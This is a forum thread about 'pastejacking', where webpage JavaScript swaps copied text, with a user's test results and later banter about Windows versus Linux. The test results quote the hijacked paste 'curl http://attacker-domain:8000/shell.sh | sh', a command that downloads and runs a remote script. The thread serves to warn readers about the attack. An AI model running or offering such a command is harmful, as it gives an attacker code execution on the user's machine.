Don't copy-paste commands from webpages...

guigirl

Don't copy-paste commands from webpages — you can get hacked

https://www.bleepingcomputer.com/news/security/dont-copy-paste-commands-from-webpages-you-can-get-hacked/
... ...
https://www.wizer-training.com/blog/copy-paste

My results:

With my uBO Global JS Block active, & no local whitelist for this site:
sudo apt update = resultant paste in my text-editor from middleclick-paste selected text [aka, "my standard method"].
sudo apt update = resultant paste in my text-editor from RMB-copy RMB-paste.
sudo apt update = resultant paste in my text-editor from Ctrl-C Ctrl-V.

With my uBO Global JS Block active, & this site partially whitelisted:

sudo apt update = resultant paste in my text-editor from middleclick-paste selected text.

curl http://attacker-domain:8000/shell.sh | sh

= resultant paste in my text-editor from RMB-copy RMB-paste.

curl http://attacker-domain:8000/shell.sh | sh

= resultant paste in my text-editor from Ctrl-C Ctrl-V.

My Conclusions:

1. uBlock Origin [/ uMatrix] Hard Mode rulz!
2. LMB-select MMB-paste rockz!
3. Debuntupop is sooooo dangerous!

Pathduck

@guigirl Yeah, this is why JS should never have had access to the local clipboard (FFS...)

Whatever dev muppet though that was a good idea?? Just so ignorant users can have the convenience of clicking a bloody button to copy text to their clipboard instead of using Ctrl+C like it's always been done /rantmode_off

Interesting article though. And yeah I guess your uBlock on masochist mode would save you

Try this one (if you dare):
https://hashbang.sh/

guigirl

@pathduck Oooooha, did !=nobody use The M Word?

paul1149

Wow. Unfortunately, the XFCE terminal, which I prefer and use though being in KDE desktop, does not have a "ignore pasted new lines" option. But my usual is to copy/paste via middle mouse, so for the most part I'm safe.

npro

@guigirl Heh, good find. And yes 1.,2., especially 2. rulz. It's what I've been using all the time, so quick, safe and comfortable, and it proves how ahead GNU/Linux and in particular good old Xorg always have been, having 2 buffers, the selection buffer and the clipboard buffer!

One can also use Shift+Insert or Ctrl+Insert or Ctrl+Shift+Insert for pasting selected text.

@pathduck said in Don't copy-paste commands from webpages...:

like it's always been done

been done where? In winblows?

npro

This post is deleted!

Pathduck

@npro said in Don't copy-paste commands from webpages...:

been done where? In winblows?

Well, what do you use in a Linux terminal window after you've selected text? Use right-click+copy with open mouth while drooling?

In a *nix terminal I guess you have to do Ctrl+Shift+C 'cause Ctrl+C sends an interrupt. Usually most GUI terminals will auto-copy to clipboard anyway, but sometimes you'll want to copy some text again.

Oh but I guess you're true o|d-5ch00l so you always boot into runlevel 3

npro

@pathduck said in Don't copy-paste commands from webpages...:

Well, what do you use in a Linux terminal window after you've selected text? Use right-click+copy with open mouth while drooling?
In a *nix terminal I guess you have to do Ctrl+Shift+C 'cause Ctrl+C sends an interrupt. Usually most GUI terminals will auto-copy to clipboard anyway, but sometimes you'll want to copy some text again.

hee hee hee hee...

• I can use select or right-click+copy in my terminal (konsole)
• I can simply drag the selected (copied) text into it or vise versa
• I can MMB-paste selected text into it, I can use Ctrl+Shift+C

guigirl

Each month when i remotely maintain Dad's win10, & each 3rd blue-moon when i can be bothered firing up my win10 VMs, i always forget that i cannot use LMB-select MMB-paste, & it still upsets me every time. It's so very handy! More than that though, as i discovered today per my OP, it also guards against hidden code in the subject-text, which only made me luuuuuurve my Nix even more.

Pathduck

@npro Well isn't that good for you...

Anyway, using Ctrl+C as copy has been standard since the first Mac[1] so no need to get all snarky about "windblows" here.

[1] https://en.wikipedia.org/wiki/Control-C

guigirl

@pathduck Methinks he doth protest too much.

npro

@pathduck So what are you saying, just because Microsoft made it a de facto standard by adopting some others' work as usually, and being a monopoly, alternative or better versions -that you don't happen to enjoy because you are still stuck with Winblows- shouldn't be further developed ? This reminds of why Microsoft is responsible for no desktop innovation for decades, +added: amongst other things like having black boxes with Management Engines, UEFIs, Secure Boots, TPMs 1,2,3 securing their interests against you, meaning closing the PC as a platform every day more and more until it becomes another Apple.

Pathduck

@npro There is no better alternative to Ctrl+C, all other alternatives require using a mouse

Oh and can we please drop the whole "mine OS is better than thine OS" thing please. It gets so tiresome...

being a monopoly

"The U.S. Government's assertion that Microsoft has a monopoly in the OS
market might be the most patently absurd claim ever advanced by the legal
mind. Linux, a technically superior operating system, is being given away
for free, and BeOS is available at a nominal price. This is simply a fact,
which has to be accepted whether or not you like Microsoft."
- Neal Stephenson, 'In the Beginning was the Command Line'

I'm perfectly comfortable with using both OSes, hell I even log in to BSD on the regular. I just choose to use Windows for personal computing.

sgunhouse

@pathduck Not all. Before Ctrl-C there was Shift-Ins, since you couldn't use Ctrl-C in a DOS program.

Pathduck

@sgunhouse Shift+Insert has always been paste hasn't it? At least in most terminal emulators it's been the standard. Being able to use Ctrl+C/V is relatively recent even in Linux terminals.

Back in the old real MS-DOS there was no paste or a clipboard at all of course. I don't think clip existed back then.

And it's only lately that MS have made it possible to use Ctrl+V to paste in a CMD window. Earlier you had to use RMB - or possibly Shift+Ins - although I can't remember ever using it for paste. And even that wasn't even possible unless "Quick Edit" was enabled, which it for some reason was not by default.

At least that's one thing *nixes has going for them - actually useful terminals

I have to log in to older Win servers on a daily basis, and if I've not logged in before, I have to spend a couple minutes setting up CMD to even be useful for anything at all.

npro

@pathduck said in Don't copy-paste commands from webpages...:

mine OS is better than thine OS

nobody told that, it's just that GNU/Linux is better than MS Windows

jumpsq

@npro

Pathduck

@npro I lived through the OS wars, man. I couldn't care less.

https://liw.fi/advocating-linux/

jumpsq

@pathduck You're right. @npro and @jumpsq are very naughty and childish and we should focus on browser wars instead of OS wars. But I hope you can secretly enjoy this as well.

npro

@pathduck Well you know, on the one hand you don't want to talk about MS, its monopoly and about Linux, on the other hand you keep posting pro-Windows, anti-Linux links, it does not look to me like someone who couldn't care less, so you'd better decide what you want?

Also if that article you linked is from 1996, that is one year after Windows 95 and before the US vs. Microsoft antitrust case in 2001, which has proven a lot in the meantime and life has proven the rest, with the latest incident of Jon writing another article about Microsoft's tactics.

Don't stick to that article, it says

If they flame Linux users, they're idiots and you should ignore them.

I think you don't want that.